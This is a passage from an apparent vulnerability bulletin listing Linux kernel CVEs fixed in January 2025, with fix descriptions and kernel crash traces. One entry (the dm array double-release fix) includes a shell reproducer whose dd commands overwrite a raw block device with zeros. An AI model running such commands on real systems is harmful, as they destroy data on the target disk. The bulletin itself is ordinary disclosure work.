[amdgpu] [ 7197.251025] ? try_wait_for_completion+0x59/0x70 [ 7197.251030] drm_atomic_helper_prepare_planes.part.0+0x2f/0x1e0 [ 7197.251035] drm_atomic_helper_prepare_planes+0x5d/0x70 [ 7197.251037] drm_atomic_helper_commit+0x84/0x160 [ 7197.251040] drm_atomic_nonblocking_commit+0x59/0x70 [ 7197.251043] drm_mode_atomic_ioctl+0x720/0x850 [ 7197.251047] ? __pfx_drm_mode_atomic_ioctl+0x10/0x10 [ 7197.251049] drm_ioctl_kernel+0xb9/0x120 [ 7197.251053] ? srso_alias_return_thunk+0x5/0xfbef5 [ 7197.251056] drm_ioctl+0x2d4/0x550 [ 7197.251058] ? __pfx_drm_mode_atomic_ioctl+0x10/0x10 [ 7197.251063] amdgpu_drm_ioctl+0x4e/0x90 [amdgpu] [ 7197.251186] __x64_sys_ioctl+0xa0/0xf0 [ 7197.251190] x64_sys_call+0x143b/0x25c0 [ 7197.251193] do_syscall_64+0x7f/0x180 [ 7197.251197] ? srso_alias_return_thunk+0x5/0xfbef5 [ 7197.251199] ? amdgpu_display_user_framebuffer_create+0x215/0x320 [amdgpu] [ 7197.251329] ? drm_internal_framebuffer_create+0xb7/0x1a0 [ 7197.251332] ? srso_alias_return_thunk+0x5/0xfbef5 (cherry picked from commit 3318ba94e56b9183d0304577c74b33b6b01ce516) | 2025-01-19 | not yet calculated | CVE-2024-57921 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Add check for granularity in dml ceil/floor helpers [Why] Wrapper functions for dcn_bw_ceil2() and dcn_bw_floor2() should check for granularity is non zero to avoid assert and divide-by-zero error in dcn_bw_ functions. [How] Add check for granularity 0. (cherry picked from commit f6e09701c3eb2ccb8cb0518e0b67f1c69742a4ec) | 2025-01-19 | not yet calculated | CVE-2024-57922 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: btrfs: zlib: fix avail_in bytes for s390 zlib HW compression path Since the input data length passed to zlib_compress_folios() can be arbitrary, always setting strm.avail_in to a multiple of PAGE_SIZE may cause read-in bytes to exceed the input range. Currently this triggers an assert in btrfs_compress_folios() on the debug kernel (see below). Fix strm.avail_in calculation for S390 hardware acceleration path. assertion failed: *total_in <= orig_len, in fs/btrfs/compression.c:1041 ------------[ cut here ]------------ kernel BUG at fs/btrfs/compression.c:1041! monitor event: 0040 ilc:2 [#1] PREEMPT SMP CPU: 16 UID: 0 PID: 325 Comm: kworker/u273:3 Not tainted 6.13.0-20241204.rc1.git6.fae3b21430ca.300.fc41.s390x+debug #1 Hardware name: IBM 3931 A01 703 (z/VM 7.4.0) Workqueue: btrfs-delalloc btrfs_work_helper Krnl PSW : 0704d00180000000 0000021761df6538 (btrfs_compress_folios+0x198/0x1a0) R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:3 CC:1 PM:0 RI:0 EA:3 Krnl GPRS: 0000000080000000 0000000000000001 0000000000000047 0000000000000000 0000000000000006 ffffff01757bb000 000001976232fcc0 000000000000130c 000001976232fcd0 000001976232fcc8 00000118ff4a0e30 0000000000000001 00000111821ab400 0000011100000000 0000021761df6534 000001976232fb58 Krnl Code: 0000021761df6528: c020006f5ef4 larl %r2,0000021762be2310 0000021761df652e: c0e5ffbd09d5 brasl %r14,00000217615978d8 #0000021761df6534: af000000 mc 0,0 >0000021761df6538: 0707 bcr 0,%r7 0000021761df653a: 0707 bcr 0,%r7 0000021761df653c: 0707 bcr 0,%r7 0000021761df653e: 0707 bcr 0,%r7 0000021761df6540: c004004bb7ec brcl 0,000002176276d518 Call Trace: [<0000021761df6538>] btrfs_compress_folios+0x198/0x1a0 ([<0000021761df6534>] btrfs_compress_folios+0x194/0x1a0) [<0000021761d97788>] compress_file_range+0x3b8/0x6d0 [<0000021761dcee7c>] btrfs_work_helper+0x10c/0x160 [<0000021761645760>] process_one_work+0x2b0/0x5d0 [<000002176164637e>] worker_thread+0x20e/0x3e0 [<000002176165221a>] kthread+0x15a/0x170 [<00000217615b859c>] __ret_from_fork+0x3c/0x60 [<00000217626e72d2>] ret_from_fork+0xa/0x38 INFO: lockdep is turned off. Last Breaking-Event-Address: [<0000021761597924>] _printk+0x4c/0x58 Kernel panic - not syncing: Fatal exception: panic_on_oops | 2025-01-19 | not yet calculated | CVE-2024-57923 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: fs: relax assertions on failure to encode file handles Encoding file handles is usually performed by a filesystem >encode_fh() method that may fail for various reasons. The legacy users of exportfs_encode_fh(), namely, nfsd and name_to_handle_at(2) syscall are ready to cope with the possibility of failure to encode a file handle. There are a few other users of exportfs_encode_{fh,fid}() that currently have a WARN_ON() assertion when ->encode_fh() fails. Relax those assertions because they are wrong. The second linked bug report states commit 16aac5ad1fa9 ("ovl: support encoding non-decodable file handles") in v6.6 as the regressing commit, but this is not accurate. The aforementioned commit only increases the chances of the assertion and allows triggering the assertion with the reproducer using overlayfs, inotify and drop_caches. Triggering this assertion was always possible with other filesystems and other reasons of ->encode_fh() failures and more particularly, it was also possible with the exact same reproducer using overlayfs that is mounted with options index=on,nfs_export=on also on kernels < v6.6. Therefore, I am not listing the aforementioned commit as a Fixes commit. Backport hint: this patch will have a trivial conflict applying to v6.6.y, and other trivial conflicts applying to stable kernels < v6.6. | 2025-01-19 | not yet calculated | CVE-2024-57924 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix a missing return value check bug In the smb2_send_interim_resp(), if ksmbd_alloc_work_struct() fails to allocate a node, it returns a NULL pointer to the in_work pointer. This can lead to an illegal memory write of in_work->response_buf when allocate_interim_rsp_buf() attempts to perform a kzalloc() on it. To address this issue, incorporating a check for the return value of ksmbd_alloc_work_struct() ensures that the function returns immediately upon allocation failure, thereby preventing the aforementioned illegal memory access. | 2025-01-19 | not yet calculated | CVE-2024-57925 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/mediatek: Set private->all_drm_private[i]->drm to NULL if mtk_drm_bind returns err The pointer need to be set to NULL, otherwise KASAN complains about use-after-free. Because in mtk_drm_bind, all private's drm are set as follows. private->all_drm_private[i]->drm = drm; And drm will be released by drm_dev_put in case mtk_drm_kms_init returns failure. However, the shutdown path still accesses the previous allocated memory in drm_atomic_helper_shutdown. [ 84.874820] watchdog: watchdog0: watchdog did not stop! [ 86.512054] ================================================================== [ 86.513162] BUG: KASAN: use-after-free in drm_atomic_helper_shutdown+0x33c/0x378 [ 86.514258] Read of size 8 at addr ffff0000d46fc068 by task shutdown/1 [ 86.515213] [ 86.515455] CPU: 1 UID: 0 PID: 1 Comm: shutdown Not tainted 6.13.0-rc1-mtk+gfa1a78e5d24b-dirty #55 [ 86.516752] Hardware name: Unknown Product/Unknown Product, BIOS 2022.10 10/01/2022 [ 86.517960] Call trace: [ 86.518333] show_stack+0x20/0x38 (C) [ 86.518891] dump_stack_lvl+0x90/0xd0 [ 86.519443] print_report+0xf8/0x5b0 [ 86.519985] kasan_report+0xb4/0x100 [ 86.520526] __asan_report_load8_noabort+0x20/0x30 [ 86.521240] drm_atomic_helper_shutdown+0x33c/0x378 [ 86.521966] mtk_drm_shutdown+0x54/0x80 [ 86.522546] platform_shutdown+0x64/0x90 [ 86.523137] device_shutdown+0x260/0x5b8 [ 86.523728] kernel_restart+0x78/0xf0 [ 86.524282] __do_sys_reboot+0x258/0x2f0 [ 86.524871] __arm64_sys_reboot+0x90/0xd8 [ 86.525473] invoke_syscall+0x74/0x268 [ 86.526041] el0_svc_common.constprop.0+0xb0/0x240 [ 86.526751] do_el0_svc+0x4c/0x70 [ 86.527251] el0_svc+0x4c/0xc0 [ 86.527719] el0t_64_sync_handler+0x144/0x168 [ 86.528367] el0t_64_sync+0x198/0x1a0 [ 86.528920] [ 86.529157] The buggy address belongs to the physical page: [ 86.529972] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0xffff0000d46fd4d0 pfn:0x1146fc [ 86.531319] flags: 0xbfffc0000000000(node=0|zone=2|lastcpupid=0xffff) [ 86.532267] raw: 0bfffc0000000000 0000000000000000 dead000000000122 0000000000000000 [ 86.533390] raw: ffff0000d46fd4d0 0000000000000000 00000000ffffffff 0000000000000000 [ 86.534511] page dumped because: kasan: bad access detected [ 86.535323] [ 86.535559] Memory state around the buggy address: [ 86.536265] ffff0000d46fbf00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 86.537314] ffff0000d46fbf80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 86.538363] >ffff0000d46fc000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 86.544733] ^ [ 86.551057] ffff0000d46fc080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 86.557510] ffff0000d46fc100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 86.563928] ================================================================== [ 86.571093] Disabling lock debugging due to kernel taint [ 86.577642] Unable to handle kernel paging request at virtual address e0e9c0920000000b [ 86.581834] KASAN: maybe wild-memory-access in range [0x0752049000000058-0x075204900000005f] ... | 2025-01-19 | not yet calculated | CVE-2024-57926 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: nfs: Fix oops in nfs_netfs_init_request() when copying to cache When netfslib wants to copy some data that has just been read on behalf of nfs, it creates a new write request and calls nfs_netfs_init_request() to initialise it, but with a NULL file pointer. This causes nfs_file_open_context() to oops - however, we don't actually need the nfs context as we're only going to write to the cache. Fix this by just returning if we aren't given a file pointer and emit a warning if the request was for something other than copy-to-cache. Further, fix nfs_netfs_free_request() so that it doesn't try to free the context if the pointer is NULL. | 2025-01-19 | not yet calculated | CVE-2024-57927 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: netfs: Fix enomem handling in buffered reads If netfs_read_to_pagecache() gets an error from either ->prepare_read() or from netfs_prepare_read_iterator(), it needs to decrement ->nr_outstanding, cancel the subrequest and break out of the issuing loop. Currently, it only does this for two of the cases, but there are two more that aren't handled. Fix this by moving the handling to a common place and jumping to it from all four places. This is in preference to inserting a wrapper around netfs_prepare_read_iterator() as proposed by Dmitry Antipov[1]. | 2025-01-19 | not yet calculated | CVE-2024-57928 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: dm array: fix releasing a faulty array block twice in dm_array_cursor_end When dm_bm_read_lock() fails due to locking or checksum errors, it releases the faulty block implicitly while leaving an invalid output pointer behind. The caller of dm_bm_read_lock() should not operate on this invalid dm_block pointer, or it will lead to undefined result. For example, the dm_array_cursor incorrectly caches the invalid pointer on reading a faulty array block, causing a double release in dm_array_cursor_end(), then hitting the BUG_ON in dm-bufio cache_put(). Reproduce steps: 1. initialize a cache device dmsetup create cmeta --table "0 8192 linear /dev/sdc 0" dmsetup create cdata --table "0 65536 linear /dev/sdc 8192" dmsetup create corig --table "0 524288 linear /dev/sdc $262144" dd if=/dev/zero of=/dev/mapper/cmeta bs=4k count=1 dmsetup create cache --table "0 524288 cache /dev/mapper/cmeta \ /dev/mapper/cdata /dev/mapper/corig 128 2 metadata2 writethrough smq 0" 2. wipe the second array block offline dmsteup remove cache cmeta cdata corig mapping_root=$(dd if=/dev/sdc bs=1c count=8 skip=192 \ 2>/dev/null | hexdump -e '1/8 "%u\n"') ablock=$(dd if=/dev/sdc bs=1c count=8 skip=$((4096*mapping_root+2056)) \ 2>/dev/null | hexdump -e '1/8 "%u\n"') dd if=/dev/zero of=/dev/sdc bs=4k count=1 seek=$ablock 3. try reopen the cache device dmsetup create cmeta --table "0 8192 linear /dev/sdc 0" dmsetup create cdata --table "0 65536 linear /dev/sdc 8192" dmsetup create corig --table "0 524288 linear /dev/sdc $262144" dmsetup create cache --table "0 524288 cache /dev/mapper/cmeta \ /dev/mapper/cdata /dev/mapper/corig 128 2 metadata2 writethrough smq 0" Kernel logs: (snip) device-mapper: array: array_block_check failed: blocknr 0 != wanted 10 device-mapper: block manager: array validator check failed for block 10 device-mapper: array: get_ablock failed device-mapper: cache metadata: dm_array_cursor_next for mapping failed ------------[ cut here ]------------ kernel BUG at drivers/md/dm-bufio.c:638! Fix by setting the cached block pointer to NULL on errors. In addition to the reproducer described above, this fix can be verified using the "array_cursor/damaged" test in dm-unit: dm-unit run /pdata/array_cursor/damaged --kernel-dir <KERNEL_DIR> | 2025-01-19 | not yet calculated | CVE-2024-57929 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net: reenable NETIF_F_IPV6_CSUM offload for BIG TCP packets The blamed commit disabled hardware offoad of IPv6 packets with extension headers on devices that advertise NETIF_F_IPV6_CSUM, based on the definition of that feature in skbuff.h: * * - %NETIF_F_IPV6_CSUM * - Driver (device) is only able to checksum plain * TCP or UDP packets over IPv6. These are specifically * unencapsulated packets of the form IPv6|TCP or * IPv6|UDP where the Next Header field in the IPv6 * header is either TCP or UDP. IPv6 extension headers * are not supported with this feature. This feature * cannot be set in features for a device with * NETIF_F_HW_CSUM also set. This feature is being * DEPRECATED (see below). The change causes skb_warn_bad_offload to fire for BIG TCP packets. [ 496.310233] WARNING: CPU: 13 PID: 23472 at net/core/dev.c:3129 skb_warn_bad_offload+0xc4/0xe0 [ 496.310297] ? skb_warn_bad_offload+0xc4/0xe0 [ 496.310300] skb_checksum_help+0x129/0x1f0 [ 496.310303] skb_csum_hwoffload_help+0x150/0x1b0 [ 496.310306] validate_xmit_skb+0x159/0x270 [ 496.310309] validate_xmit_skb_list+0x41/0x70 [ 496.310312] sch_direct_xmit+0x5c/0x250 [ 496.310317] __qdisc_run+0x388/0x620 BIG TCP introduced an IPV6_TLV_JUMBO IPv6 extension header to communicate packet length, as this is an IPv6 jumbogram. But, the feature is only enabled on devices that support BIG TCP TSO. The header is only present for PF_PACKET taps like tcpdump, and not transmitted by physical devices. For this specific case of extension headers that are not transmitted, return to the situation before the blamed commit and support hardware offload. ipv6_has_hopopt_jumbo() tests not only whether this header is present, but also that it is the only extension header before a terminal (L4) header. | 2025-01-15 | not yet calculated | CVE-2025-21629 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: block, bfq: fix waker_bfqq UAF after bfq_split_bfqq() Our syzkaller report a following UAF for v6.6: BUG: KASAN: slab-use-after-free in bfq_init_rq+0x175d/0x17a0 block/bfq-iosched.c:6958 Read of size 8 at addr ffff8881b57147d8 by task fsstress/232726 CPU: 2 PID: 232726 Comm: fsstress Not tainted 6.6.0-g3629d1885222 #39 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x91/0xf0 lib/dump_stack.c:106 print_address_description.constprop.0+0x66/0x300 mm/kasan/report.c:364 print_report+0x3e/0x70 mm/kasan/report.c:475 kasan_report+0xb8/0xf0 mm/kasan/report.c:588 hlist_add_head include/linux/list.h:1023 [inline] bfq_init_rq+0x175d/0x17a0 block/bfq-iosched.c:6958 bfq_insert_request.isra.0+0xe8/0xa20 block/bfq-iosched.c:6271 bfq_insert_requests+0x27f/0x390 block/bfq-iosched.c:6323 blk_mq_insert_request+0x290/0x8f0 block/blk-mq.c:2660 blk_mq_submit_bio+0x1021/0x15e0 block/blk-mq.c:3143 __submit_bio+0xa0/0x6b0 block/blk-core.c:639 __submit_bio_noacct_mq block/blk-core.c:718 [inline] submit_bio_noacct_nocheck+0x5b7/0x810 block/blk-core.c:747 submit_bio_noacct+0xca0/0x1990 block/blk-core.c:847 __ext4_read_bh fs/ext4/super.c:205 [inline] ext4_read_bh+0x15e/0x2e0 fs/ext4/super.c:230 __read_extent_tree_block+0x304/0x6f0 fs/ext4/extents.c:567 ext4_find_extent+0x479/0xd20 fs/ext4/extents.c:947 ext4_ext_map_blocks+0x1a3/0x2680 fs/ext4/extents.c:4182 ext4_map_blocks+0x929/0x15a0 fs/ext4/inode.c:660 ext4_iomap_begin_report+0x298/0x480 fs/ext4/inode.c:3569 iomap_iter+0x3dd/0x1010 fs/iomap/iter.c:91 iomap_fiemap+0x1f4/0x360 fs/iomap/fiemap.c:80 ext4_fiemap+0x181/0x210 fs/ext4/extents.c:5051 ioctl_fiemap.isra.0+0x1b4/0x290 fs/ioctl.c:220 do_vfs_ioctl+0x31c/0x11a0 fs/ioctl.c:811 __do_sys_ioctl fs/ioctl.c:869 [inline] __se_sys_ioctl+0xae/0x190 fs/ioctl.c:857 do_syscall_x64 arch/x86/entry/common.c:51 [inline] do_syscall_64+0x70/0x120 arch/x86/entry/common.c:81 entry_SYSCALL_64_after_hwframe+0x78/0xe2 Allocated by task 232719: kasan_save_stack+0x22/0x50 mm/kasan/common.c:45 kasan_set_track+0x25/0x30 mm/kasan/common.c:52 __kasan_slab_alloc+0x87/0x90 mm/kasan/common.c:328 kasan_slab_alloc include/linux/kasan.h:188 [inline] slab_post_alloc_hook mm/slab.h:768 [inline] slab_alloc_node mm/slub.c:3492 [inline] kmem_cache_alloc_node+0x1b8/0x6f0 mm/slub.c:3537 bfq_get_queue+0x215/0x1f00 block/bfq-iosched.c:5869 bfq_get_bfqq_handle_split+0x167/0x5f0 block/bfq-iosched.c:6776 bfq_init_rq+0x13a4/0x17a0 block/bfq-iosched.c:6938 bfq_insert_request.isra.0+0xe8/0xa20 block/bfq-iosched.c:6271 bfq_insert_requests+0x27f/0x390 block/bfq-iosched.c:6323 blk_mq_insert_request+0x290/0x8f0 block/blk-mq.c:2660 blk_mq_submit_bio+0x1021/0x15e0 block/blk-mq.c:3143 __submit_bio+0xa0/0x6b0 block/blk-core.c:639 __submit_bio_noacct_mq block/blk-core.c:718 [inline] submit_bio_noacct_nocheck+0x5b7/0x810 block/blk-core.c:747 submit_bio_noacct+0xca0/0x1990 block/blk-core.c:847 __ext4_read_bh fs/ext4/super.c:205 [inline] ext4_read_bh_nowait+0x15a/0x240 fs/ext4/super.c:217 ext4_read_bh_lock+0xac/0xd0 fs/ext4/super.c:242 ext4_bread_batch+0x268/0x500 fs/ext4/inode.c:958 __ext4_find_entry+0x448/0x10f0 fs/ext4/namei.c:1671 ext4_lookup_entry fs/ext4/namei.c:1774 [inline] ext4_lookup.part.0+0x359/0x6f0 fs/ext4/namei.c:1842 ext4_lookup+0x72/0x90 fs/ext4/namei.c:1839 __lookup_slow+0x257/0x480 fs/namei.c:1696 lookup_slow fs/namei.c:1713 [inline] walk_component+0x454/0x5c0 fs/namei.c:2004 link_path_walk.part.0+0x773/0xda0 fs/namei.c:2331 link_path_walk fs/namei.c:3826 [inline] path_openat+0x1b9/0x520 fs/namei.c:3826 do_filp_open+0x1b7/0x400 fs/namei.c:3857 do_sys_openat2+0x5dc/0x6e0 fs/open.c:1428 do_sys_open fs/open.c:1443 [inline] __do_sys_openat fs/open.c:1459 [inline] __se_sys_openat fs/open.c:1454 [inline] __x64_sys_openat+0x148/0x200 fs/open.c:1454 do_syscall_x64 arch/x86/entry/common.c:51 [inline] do_syscall_6 ---truncated--- | 2025-01-19 | not yet calculated | CVE-2025-21631 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: x86/fpu: Ensure shadow stack is active before "getting" registers The x86 shadow stack support has its own set of registers. Those registers are XSAVE-managed, but they are "supervisor state components" which means that userspace can not touch them with XSAVE/XRSTOR. It also means that they are not accessible from the existing ptrace ABI for XSAVE state. Thus, there is a new ptrace get/set interface for it. The regset code that ptrace uses provides an ->active() handler in addition to the get/set ones. For shadow stack this ->active() handler verifies that shadow stack is enabled via the ARCH_SHSTK_SHSTK bit in the thread struct. The ->active() handler is checked from some call sites of the regset get/set handlers, but not the ptrace ones. This was not understood when shadow stack support was put in place. As a result, both the set/get handlers can be called with XFEATURE_CET_USER in its init state, which would cause get_xsave_addr() to return NULL and trigger a WARN_ON(). The ssp_set() handler luckily has an ssp_active() check to avoid surprising the kernel with shadow stack behavior when the kernel is not ready for it (ARCH_SHSTK_SHSTK==0). That check just happened to avoid the warning. But the ->get() side wasn't so lucky. It can be called with shadow stacks disabled, triggering the warning in practice, as reported by Christina Schimpe: WARNING: CPU: 5 PID: 1773 at arch/x86/kernel/fpu/regset.c:198 ssp_get+0x89/0xa0 [...] Call Trace: <TASK> ? show_regs+0x6e/0x80 ? ssp_get+0x89/0xa0 ? __warn+0x91/0x150 ? ssp_get+0x89/0xa0 ? report_bug+0x19d/0x1b0 ? handle_bug+0x46/0x80 ? exc_invalid_op+0x1d/0x80 ? asm_exc_invalid_op+0x1f/0x30 ? __pfx_ssp_get+0x10/0x10 ? ssp_get+0x89/0xa0 ? ssp_get+0x52/0xa0 __regset_get+0xad/0xf0 copy_regset_to_user+0x52/0xc0 ptrace_regset+0x119/0x140 ptrace_request+0x13c/0x850 ? wait_task_inactive+0x142/0x1d0 ? do_syscall_64+0x6d/0x90 arch_ptrace+0x102/0x300 [...] Ensure that shadow stacks are active in a thread before looking them up in the XSAVE buffer. Since ARCH_SHSTK_SHSTK and user_ssp[SHSTK_EN] are set at the same time, the active check ensures that there will be something to find in the XSAVE buffer. [ dhansen: changelog/subject tweaks ] | 2025-01-19 | not yet calculated | CVE-2025-21632 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: io_uring/sqpoll: zero sqd->thread on tctx errors Syzkeller reports: BUG: KASAN: slab-use-after-free in thread_group_cputime+0x409/0x700 kernel/sched/cputime.c:341 Read of size 8 at addr ffff88803578c510 by task syz.2.3223/27552 Call Trace: <TASK> ... kasan_report+0x143/0x180 mm/kasan/report.c:602 thread_group_cputime+0x409/0x700 kernel/sched/cputime.c:341 thread_group_cputime_adjusted+0xa6/0x340 kernel/sched/cputime.c:639 getrusage+0x1000/0x1340 kernel/sys.c:1863 io_uring_show_fdinfo+0xdfe/0x1770 io_uring/fdinfo.c:197 seq_show+0x608/0x770 fs/proc/fd.c:68 ... That's due to sqd->task not being cleared properly in cases where SQPOLL task tctx setup fails, which can essentially only happen with fault injection to insert allocation errors. | 2025-01-19 | not yet calculated | CVE-2025-21633 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: cgroup/cpuset: remove kernfs active break A warning was found: WARNING: CPU: 10 PID: 3486953 at fs/kernfs/file.c:828 CPU: 10 PID: 3486953 Comm: rmdir Kdump: loaded Tainted: G RIP: 0010:kernfs_should_drain_open_files+0x1a1/0x1b0 RSP: 0018:ffff8881107ef9e0 EFLAGS: 00010202 RAX: 0000000080000002 RBX: ffff888154738c00 RCX: dffffc0000000000 RDX: 0000000000000007 RSI: 0000000000000004 RDI: ffff888154738c04 RBP: ffff888154738c04 R08: ffffffffaf27fa15 R09: ffffed102a8e7180 R10: ffff888154738c07 R11: 0000000000000000 R12: ffff888154738c08 R13: ffff888750f8c000 R14: ffff888750f8c0e8 R15: ffff888154738ca0 FS: 00007f84cd0be740(0000) GS:ffff8887ddc00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000555f9fbe00c8 CR3: 0000000153eec001 CR4: 0000000000370ee0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: kernfs_drain+0x15e/0x2f0 __kernfs_remove+0x165/0x300 kernfs_remove_by_name_ns+0x7b/0xc0 cgroup_rm_file+0x154/0x1c0 cgroup_addrm_files+0x1c2/0x1f0 css_clear_dir+0x77/0x110 kill_css+0x4c/0x1b0 cgroup_destroy_locked+0x194/0x380 cgroup_rmdir+0x2a/0x140 It can be explained by: rmdir echo 1 > cpuset.cpus kernfs_fop_write_iter // active=0 cgroup_rm_file kernfs_remove_by_name_ns kernfs_get_active // active=1 __kernfs_remove // active=0x80000002 kernfs_drain cpuset_write_resmask wait_event //waiting (active == 0x80000001) kernfs_break_active_protection // active = 0x80000001 // continue kernfs_unbreak_active_protection // active = 0x80000002 ... kernfs_should_drain_open_files // warning occurs kernfs_put_active This warning is caused by 'kernfs_break_active_protection' when it is writing to cpuset.cpus, and the cgroup is removed concurrently. The commit 3a5a6d0c2b03 ("cpuset: don't nest cgroup_mutex inside get_online_cpus()") made cpuset_hotplug_workfn asynchronous, This change involves calling flush_work(), which can create a multiple processes circular locking dependency that involve cgroup_mutex, potentially leading to a deadlock. To avoid deadlock. the commit 76bb5ab8f6e3 ("cpuset: break kernfs active protection in cpuset_write_resmask()") added 'kernfs_break_active_protection' in the cpuset_write_resmask. This could lead to this warning. After the commit 2125c0034c5d ("cgroup/cpuset: Make cpuset hotplug processing synchronous"), the cpuset_write_resmask no longer needs to wait the hotplug to finish, which means that concurrent hotplug and cpuset operations are no longer possible. Therefore, the deadlock doesn't exist anymore and it does not have to 'break active protection' now. To fix this warning, just remove kernfs_break_active_protection operation in the 'cpuset_write_resmask'. | 2025-01-19 | not yet calculated | CVE-2025-21634 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: rds: sysctl: rds_tcp_{rcv,snd}buf: avoid using current->nsproxy As mentioned in a previous commit of this series, using the 'net' structure via 'current' is not recommended for different reasons: - Inconsistency: getting info from the reader's/writer's netns vs only from the opener's netns. - current->nsproxy can be NULL in some cases, resulting in an 'Oops' (null-ptr-deref), e.g. when the current task is exiting, as spotted by syzbot [1] using acct(2). The per-netns structure can be obtained from the table->data using container_of(), then the 'net' one can be retrieved from the listen socket (if available). | 2025-01-19 | not yet calculated | CVE-2025-21635 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: sctp: sysctl: plpmtud_probe_interval: avoid using current->nsproxy As mentioned in a previous commit of this series, using the 'net' structure via 'current' is not recommended for different reasons: - Inconsistency: getting info from the reader's/writer's netns vs only from the opener's netns. - current->nsproxy can be NULL in some cases, resulting in an 'Oops' (null-ptr-deref), e.g. when the current task is exiting, as spotted by syzbot [1] using acct(2). The 'net' structure can be obtained from the table->data using container_of(). Note that table->data could also be used directly, as this is the only member needed from the 'net' structure, but that would increase the size of this fix, to use '*data' everywhere 'net->sctp.probe_interval' is used. | 2025-01-19 | not yet calculated | CVE-2025-21636 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: sctp: sysctl: udp_port: avoid using current->nsproxy As mentioned in a previous commit of this series, using the 'net' structure via 'current' is not recommended for different reasons: - Inconsistency: getting info from the reader's/writer's netns vs only from the opener's netns. - current->nsproxy can be NULL in some cases, resulting in an 'Oops' (null-ptr-deref), e.g. when the current task is exiting, as spotted by syzbot [1] using acct(2). The 'net' structure can be obtained from the table->data using container_of(). Note that table->data could also be used directly, but that would increase the size of this fix, while 'sctp.ctl_sock' still needs to be retrieved from 'net' structure. | 2025-01-19 | not yet calculated | CVE-2025-21637 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: sctp: sysctl: auth_enable: avoid using current->nsproxy As mentioned in a previous commit of this series, using the 'net' structure via 'current' is not recommended for different reasons: - Inconsistency: getting info from the reader's/writer's netns vs only from the opener's netns. - current->nsproxy can be NULL in some cases, resulting in an 'Oops' (null-ptr-deref), e.g. when the current task is exiting, as spotted by syzbot [1] using acct(2). The 'net' structure can be obtained from the table->data using container_of(). Note that table->data could also be used directly, but that would increase the size of this fix, while 'sctp.ctl_sock' still needs to be retrieved from 'net' structure. | 2025-01-19 | not yet calculated | CVE-2025-21638 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: sctp: sysctl: rto_min/max: avoid using current->nsproxy As mentioned in a previous commit of this series, using the 'net' structure via 'current' is not recommended for different reasons: - Inconsistency: getting info from the reader's/writer's netns vs only from the opener's netns. - current->nsproxy can be NULL in some cases, resulting in an 'Oops' (null-ptr-deref), e.g. when the current task is exiting, as spotted by syzbot [1] using acct(2). The 'net' structure can be obtained from the table->data using container_of(). Note that table->data could also be used directly, as this is the only member needed from the 'net' structure, but that would increase the size of this fix, to use '*data' everywhere 'net->sctp.rto_min/max' is used. | 2025-01-19 | not yet calculated | CVE-2025-21639 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: sctp: sysctl: cookie_hmac_alg: avoid using current->nsproxy As mentioned in a previous commit of this series, using the 'net' structure via 'current' is not recommended for different reasons: - Inconsistency: getting info from the reader's/writer's netns vs only from the opener's netns. - current->nsproxy can be NULL in some cases, resulting in an 'Oops' (null-ptr-deref), e.g. when the current task is exiting, as spotted by syzbot [1] using acct(2). The 'net' structure can be obtained from the table->data using container_of(). Note that table->data could also be used directly, as this is the only member needed from the 'net' structure, but that would increase the size of this fix, to use '*data' everywhere 'net->sctp.sctp_hmac_alg' is used. | 2025-01-19 | not yet calculated | CVE-2025-21640 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mptcp: sysctl: blackhole timeout: avoid using current->nsproxy As mentioned in the previous commit, using the 'net' structure via 'current' is not recommended for different reasons: - Inconsistency: getting info from the reader's/writer's netns vs only from the opener's netns. - current->nsproxy can be NULL in some cases, resulting in an 'Oops' (null-ptr-deref), e.g. when the current task is exiting, as spotted by syzbot [1] using acct(2). The 'pernet' structure can be obtained from the table->data using container_of(). | 2025-01-19 | not yet calculated | CVE-2025-21641 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mptcp: sysctl: sched: avoid using current->nsproxy Using the 'net' structure via 'current' is not recommended for different reasons. First, if the goal is to use it to read or write per-netns data, this is inconsistent with how the "generic" sysctl entries are doing: directly by only using pointers set to the table entry, e.g. table->data. Linked to that, the per-netns data should always be obtained from the table linked to the netns it had been created for, which may not coincide with the reader's or writer's netns. Another reason is that access to current->nsproxy->netns can oops if attempted when current->nsproxy had been dropped when the current task is exiting. This is what syzbot found, when using acct(2): Oops: general protection fault, probably for non-canonical address 0xdffffc0000000005: 0000 [#1] PREEMPT SMP KASAN PTI KASAN: null-ptr-deref in range [0x0000000000000028-0x000000000000002f] CPU: 1 UID: 0 PID: 5924 Comm: syz-executor Not tainted 6.13.0-rc5-syzkaller-00004-gccb98ccef0e5 #0 Hardware 